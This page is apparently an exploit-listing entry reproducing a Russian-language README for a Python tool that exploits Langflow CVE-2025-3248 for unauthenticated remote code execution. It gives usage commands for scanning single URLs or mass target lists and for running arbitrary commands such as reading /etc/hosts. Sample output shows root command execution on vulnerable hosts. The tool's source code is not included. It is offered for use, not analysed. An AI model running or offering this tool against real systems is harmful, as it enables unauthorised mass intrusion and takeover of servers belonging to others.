Sploitus

Exploit for CVE-2025-3248

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN62 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IMBAS007-CVE-2025-3248
# Эксплойт для Langflow CVE-2025-3248

Эксплойт Π½Π° Python для CVE-2025-3248, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ позволяСт ΡƒΠ΄Π°Π»Ρ‘Π½Π½Ρ‹ΠΌ Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΌ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ Π½Π° уязвимых экзСмплярах Langflow с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ сформированных HTTP-запросов.

## ВозмоТности

  * Π‘ΠΊΠ°Π½ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΎΠ΄Π½ΠΎΠ³ΠΎ URL ΠΈΠ»ΠΈ массовоС сканированиС ΠΈΠ· Ρ„Π°ΠΉΠ»Π°
  * АвтоматичСскоС ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠ΅ уязвимости
  * Π’ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄
  * ΠŸΠΎΠ΄Ρ€ΠΎΠ±Π½Ρ‹ΠΉ Π²Ρ‹Π²ΠΎΠ΄ с ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠ΅ΠΉ ΠΎ Π²Ρ€Π΅ΠΌΠ΅Π½ΠΈ выполнСния
  * Π‘ΠΎΡ…Ρ€Π°Π½Π΅Π½ΠΈΠ΅ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ΠΎΠ² Π² ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ для уязвимых ΠΈ нСуязвимых Ρ†Π΅Π»Π΅ΠΉ
  * Бтатистика ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΠΈ сканирования



## ИспользованиС

### Π‘ΠΊΠ°Π½ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΎΠ΄Π½ΠΎΠ³ΠΎ URL

root@kitploit:~
    
    
    python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"
    

### МассовоС сканированиС ΠΈΠ· Ρ„Π°ΠΉΠ»Π°

root@kitploit:~
    
    
    python CVE-2025-3248.py -f targets.txt
    

### Π’Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½ΠΎΠΉ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹

root@kitploit:~
    
    
    python CVE-2025-3248.py -f targets.txt -c "whoami"
    

## ΠŸΡ€ΠΈΠΌΠ΅Ρ€ Π²Ρ‹Π²ΠΎΠ΄Π°

root@kitploit:~
    
    
    [*] Progress: 1/10 URLs checked
    [*] Checking https://example.com
    [+] Vulnerable - Command Output:
    uid=0(root) gid=0(root) groups=0(root)
    --------------------------------------------------
    
    [*] Scan Summary:
    [+] Total URLs checked: 10
    [+] Vulnerable URLs: 3
    [+] Not Vulnerable URLs: 7
    [*] Total scan time: 25.34s
    [*] Results saved to files with timestamp
    

источник: https://github.com/verylazytech